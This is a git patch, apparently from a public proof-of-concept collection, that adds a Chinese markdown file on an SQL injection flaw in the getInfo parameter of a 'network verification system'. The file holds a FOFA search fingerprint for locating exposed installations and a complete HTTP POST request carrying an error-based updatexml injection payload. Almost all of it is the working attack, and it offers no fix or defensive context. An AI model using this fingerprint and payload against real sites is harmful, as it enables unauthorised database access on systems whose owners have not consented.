From d771816d12ee28ed79db7fc0b0b10b563cfb2382 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 27 Mar 2024 10:19:42 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=BD=91=E7=BB=9C=E9=AA=8C=E8=AF=81?= =?UTF-8?q?=E7=B3=BB=E7=BB=9FgetInfo=E5=8F=82=E6=95=B0=E5=AD=98=E5=9C=A8SQ?= =?UTF-8?q?L=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 网络验证系统getInfo参数存在SQL注入漏洞.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 网络验证系统getInfo参数存在SQL注入漏洞.md diff --git a/网络验证系统getInfo参数存在SQL注入漏洞.md b/网络验证系统getInfo参数存在SQL注入漏洞.md new file mode 100644 index 0000000..6e00506 --- /dev/null +++ b/网络验证系统getInfo参数存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +## 网络验证系统getInfo参数存在SQL注入漏洞 + + +## fofa +``` +body="zhuya/js/base.js" +``` + +## poc +``` +POST /index.php/api/Software/getInfo HTTP/1.1 +Host: +Content-Length: 0 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +data=123456&id=1 and updatexml(1,concat(0x7e,md5(123),0x7e),1) +``` + + +![image](https://github.com/wy876/POC/assets/139549762/c0c54626-76ac-440a-97be-760bb17c61cb)